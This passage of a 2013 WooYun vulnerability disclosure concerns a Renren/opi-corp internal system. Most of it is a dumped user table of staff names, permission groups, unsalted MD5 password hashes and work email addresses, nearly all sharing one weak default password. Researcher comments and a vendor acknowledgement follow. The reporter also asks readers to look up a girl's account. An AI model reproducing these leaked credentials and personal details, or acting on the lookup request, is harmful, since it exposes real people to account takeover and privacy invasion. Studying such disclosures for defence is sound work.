人员013 	,36, 	e10adc3949ba59abbe56e057f20f883e 	人员013 	624
人员014 	,36, 	e10adc3949ba59abbe56e057f20f883e 	2865478069@qq.com 	676
人员014 	,36, 	e10adc3949ba59abbe56e057f20f883e 	人员014 	625
人员015 	,36, 	e10adc3949ba59abbe56e057f20f883e 	2495130598@qq.com 	677
人员016 	,36, 	e10adc3949ba59abbe56e057f20f883e 	2416780571@qq.com 	678
人员017 	,36, 	e10adc3949ba59abbe56e057f20f883e 	1363371985@qq.com 	679
人员018 	,36, 	e10adc3949ba59abbe56e057f20f883e 	1501159187@qq.com 	680
人员019 	,36, 	e10adc3949ba59abbe56e057f20f883e 	1271517861@qq.com 	681
人员020 	,36, 	e10adc3949ba59abbe56e057f20f883e 	2863320054@qq.com 	682
任炎 	,6, 	e10adc3949ba59abbe56e057f20f883e 	renyan1 	168
施海龙 	,44,40,11, 	e10adc3949ba59abbe56e057f20f883e 	hailong.shi@opi-corp.com 	642
石海峰 	,37, 	e10adc3949ba59abbe56e057f20f883e 	haifeng.shi@opi-corp.com 	646
实习生01 	,, 	e10adc3949ba59abbe56e057f20f883e 	shixisheng01@opi-corp.com 	683
实习生02 	,11, 	e10adc3949ba59abbe56e057f20f883e 	shixisheng02@opi-corp.com 	684
实习生03 	,11, 	e10adc3949ba59abbe56e057f20f883e 	shixisheng03@opi-corp.com 	685
实习生04 	,11, 	e10adc3949ba59abbe56e057f20f883e 	shixisheng04@opi-corp.com 	686
实习生05 	,11, 	e10adc3949ba59abbe56e057f20f883e 	shixisheng05@opi-corp.com 	687
实习生06 	,11, 	e10adc3949ba59abbe56e057f20f883e 	shixisheng06@opi-corp.com 	688
实习生07 	,11, 	e10adc3949ba59abbe56e057f20f883e 	shixisheng07@opi-corp.com 	689
实习生08 	,11, 	e10adc3949ba59abbe56e057f20f883e 	shixisheng08@opi-corp.com 	690
实习生09 	,11, 	e10adc3949ba59abbe56e057f20f883e 	shixisheng09@opi-corp.com 	691
实习生1 	,24, 	e10adc3949ba59abbe56e057f20f883e 	shixi1 	440
实习生10 	,11, 	e10adc3949ba59abbe56e057f20f883e 	shixisheng10@opi-corp.com 	692
实习生2 	,24, 	e10adc3949ba59abbe56e057f20f883e 	shixi2 	441
实习生3 	,24, 	e10adc3949ba59abbe56e057f20f883e 	shixi3 	442
实习生4 	,24, 	e10adc3949ba59abbe56e057f20f883e 	shixi4 	443
实习生5 	,24, 	e10adc3949ba59abbe56e057f20f883e 	shixi5 	444
史浩辰 	,24, 	e10adc3949ba59abbe56e057f20f883e 	shihaochen 	397
舒艺 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.yi.shu@opi-corp.com 	712
宋天翼 	,4, 	e10adc3949ba59abbe56e057f20f883e 	tianyi.song@opi-corp.com 	675
隋轶 	,34, 	fdc2227d75b19d1924797788fdbaee45 	yi.sui@opi-corp.com 	635
孙晓峰 	,0, 	e10adc3949ba59abbe56e057f20f883e 	xiaofeng.sun@opi-corp.com 	74
孙宇 	,44,40, 	4297f44b13955235245b2497399d7a93 	zhiwei.liu@renren-inc.com 	755
孙宇 	,40,11,4, 	e10adc3949ba59abbe56e057f20f883e 	sun.yu@opi-corp.com 	671
孙宇 	,44,40,11,4, 	e10adc3949ba59abbe56e057f20f883e 	yu.sun@opi-corp.com 	650
孙振博 	,37, 	d41d8cd98f00b204e9800998ecf8427e 	zhenbo.sun@opi-corp.com 	569
谭静 	,11, 	e10adc3949ba59abbe56e057f20f883e 	jing.tan@opi-corp.com 	372
唐靓 	,24,6,4, 	e10adc3949ba59abbe56e057f20f883e 	liang.tang@opi-corp.com 	530
唐守滨 	,34, 	e10adc3949ba59abbe56e057f20f883e 	shoubin.tang@opi-corp.com 	69
特单处理 	,11, 	e10adc3949ba59abbe56e057f20f883e 	tedanchuli 	719
田佳 	,44,40,4, 	e10adc3949ba59abbe56e057f20f883e 	jia.tian@opi-corp.com 	733
田宇 	,38, 	e10adc3949ba59abbe56e057f20f883e 	yu.tian3@opi-corp.com 	770
佟辉 	,24, 	e10adc3949ba59abbe56e057f20f883e 	tonghui 	778
王超 	,4, 	e10adc3949ba59abbe56e057f20f883e 	chao.wang@opi-corp.com 	481
王超 	,6, 	e10adc3949ba59abbe56e057f20f883e 	chao.wang5@opi-corp.com 	652
王春翔 	,0, 	e10adc3949ba59abbe56e057f20f883e 	wangchunxiang 	489
王东艳 	,11, 	e10adc3949ba59abbe56e057f20f883e 	dongyan.wang@renren-inc.com 	532
王国良 	,43,42,39,4, 	de88e3e4ab202d87754078cbb2df6063 	guoliang.wang@opi-corp.com 	731
王欢 	,4, 	e10adc3949ba59abbe56e057f20f883e 	wanghuan 	490
王建坤 	,0,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,31,24,11,6,4, 	c33367701511b4f6020ec61ded352059 	jiankun.wang@opi-corp.com 	538
王金刚 	,11, 	e10adc3949ba59abbe56e057f20f883e 	jingang.wang@opi-corp.com 	570
王敬宇 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.jingyu.wang@opi-corp.com 	772
王坤 	,, 	e10adc3949ba59abbe56e057f20f883e 	kun.wang@opi-corp.com 	376
王亮 	,43,42,39, 	de88e3e4ab202d87754078cbb2df6063 	wang-liang 	730
王美男 	,34, 	e10adc3949ba59abbe56e057f20f883e 	meinan.wang@opi-corp.com 	520
王萌 	,43,42,39,11, 	e10adc3949ba59abbe56e057f20f883e 	wangmeng@opi-corp.com 	626
王孟璞 	,11, 	e10adc3949ba59abbe56e057f20f883e 	mengpu.wang@opi-corp.com 	445
王赛 	,48, 	e10adc3949ba59abbe56e057f20f883e 	sai.wang@opi-corp.com 	537
王涛 	,33, 	e10adc3949ba59abbe56e057f20f883e 	tao.wang@opi-corp.com 	517
王万勇 	,24,4, 	f6be0503eb9fcd1e7a3dc6917c4068ee 	wangwanyong 	410
王维国 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.weiguo.wang@opi-corp.com

修复方案:

过滤XSS,然后限制管理员权限,加强培训啦
求礼物,求人人管理加我skype whirlwind110@live.com
想要拜托你们一件事,查一个女孩的号。。。

版权声明:转载请注明来源 whirlwind@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-02-11 13:15

厂商回复:

感谢

最新状态:

暂无

漏洞评价:

评论

  1. 2013-02-07 22:34 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    oh my god,现在还能直接load_file?奇葩了

  2. 2013-02-07 22:35 | whirlwind ( 实习白帽子 | Rank:34 漏洞数:8 | 极光肖风)

    @疯狗 刚才下尿了,就是没法outfile

  3. 2013-02-07 22:45 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @whirlwind 权限没满足?还是不同机器?

  4. 2013-02-07 22:54 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    这是新年大礼包?

  5. 2013-02-07 22:56 | yhoojj ( 普通白帽子 | Rank:110 漏洞数:14 | BurNing)

    新年大礼包咯

  6. 2013-02-07 22:58 | whirlwind ( 实习白帽子 | Rank:34 漏洞数:8 | 极光肖风)

    @疯狗 魔术。。。难住了。。后台没得上传 FCK2.66

  7. 2013-02-08 08:40 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    你这不是直接不让人过年么。。

  8. 2013-02-08 13:50 | whirlwind ( 实习白帽子 | Rank:34 漏洞数:8 | 极光肖风)

    @蟋蟀哥哥 我也刚想到这个问题,,只能给人人管理说抱歉了

  9. 2013-02-08 15:13 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @whirlwind 太坏了。不让人好好过年。。

  10. 2013-02-12 00:10 | Csser ( 路人 | Rank:11 漏洞数:6 )

    洞主太坏了,人家又得加班了。

  11. 2013-02-13 09:59 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    我过年就老老实实吃肉

  12. 2013-02-13 17:34 | 不懂xx ( 路人 | Rank:22 漏洞数:5 | 虚空假面,去哪儿)

    都暴路径还能loadfile,我个日啊。

  13. 2013-02-16 23:55 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @xsser 胖了还是瘦了,胖了是吃的猪肉,瘦了是肉被女人吃了

  14. 2013-03-03 15:50 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    tags标签有点小多额。。

  15. 2013-03-04 09:33 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    你这泄露的有点多,应该打马赛克,这人人,得改多少密码啊

  16. 2013-03-04 11:11 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    证明图上露点咯

  17. 2013-03-15 15:17 | whitemonty ( 路人 | Rank:7 漏洞数:4 | Secur1ty just lik3 a girl. B0th of th3m ...)

    还是Tags标签……霸气!

  18. 2013-03-25 00:49 | 西毒 ( 普通白帽子 | Rank:221 漏洞数:33 | 心存谦卑才能不断超越自我)

    这种思路值得学习啊

  19. 2013-03-25 13:59 | Tracker ( 路人 | Rank:16 漏洞数:4 | 厂商虐我千百遍,我待厂商如初恋!)

    @蟋蟀哥哥 osc的@&Tracker 路过。。

  20. 2013-03-25 15:07 | 银冥币 ( 实习白帽子 | Rank:35 漏洞数:21 | "/upload/avatar/avatar_251_b.jpg" />)

    标签v5...